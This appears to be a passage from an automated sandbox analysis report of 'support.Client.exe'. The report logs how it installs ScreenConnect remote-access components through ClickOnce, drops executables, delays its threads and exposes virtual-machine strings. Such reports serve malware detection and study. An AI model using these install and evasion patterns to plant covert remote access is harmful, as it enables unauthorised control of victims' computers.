Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Memory allocated: 30C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Memory allocated: 14E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Memory allocated: 1790000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Memory allocated: 1F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Memory allocated: 1DC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Memory allocated: 1670000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Memory allocated: 1B040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Memory allocated: 1080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Memory allocated: 1AA70000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599542	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599432	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599320	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599209	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599081	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598841	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598725	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598617	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598506	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598379	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598251	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598126	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597886	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597774	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597663	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597551	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597423	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597295	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597184	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597072	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596960	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596848	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596721	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596370	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596258	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596147	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596035	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595684	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595573	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595461	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595349	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595221	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595095	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594856	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594744	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594632	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594520	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594392	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll	Jump to dropped file

Source: C:\Windows\System32\svchost.exe TID: 6716	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\support.Client.exe TID: 7644	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -599654s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -599542s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -599432s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -599320s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -599209s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -599081s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -598841s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -598725s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -598617s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -598506s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -598379s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -598251s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -598126s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597998s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597886s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597774s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597663s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597551s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597423s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597295s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597184s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -597072s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596960s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596848s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596721s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596482s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596370s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596258s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596147s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -596035s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -595907s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -595796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -595684s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -595573s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -595461s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -595349s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -595221s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -595095s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -594856s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -594744s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -594632s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -594520s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736	Thread sleep time: -594392s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe TID: 1228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe TID: 780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe TID: 7376	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation	Jump to behavior

Source: C:\Users\user\Downloads\support.Client.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599542	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599432	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599320	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599209	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599081	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598841	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598725	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598617	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598506	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598379	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598251	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598126	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597886	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597774	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597663	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597551	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597423	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597295	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597184	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597072	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596960	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596848	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596721	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596370	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596258	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596147	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596035	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595684	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595573	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595461	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595349	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595221	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595095	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594856	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594744	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594632	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594520	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594392	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Source: ScreenConnect.ClientService.exe, 00000013.00000002.2403914597.00000000012CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: svchost.exe, 00000004.00000002.2412623067.00000227B8E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(c
Source: svchost.exe, 00000009.00000002.2406431788.0000022170465000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
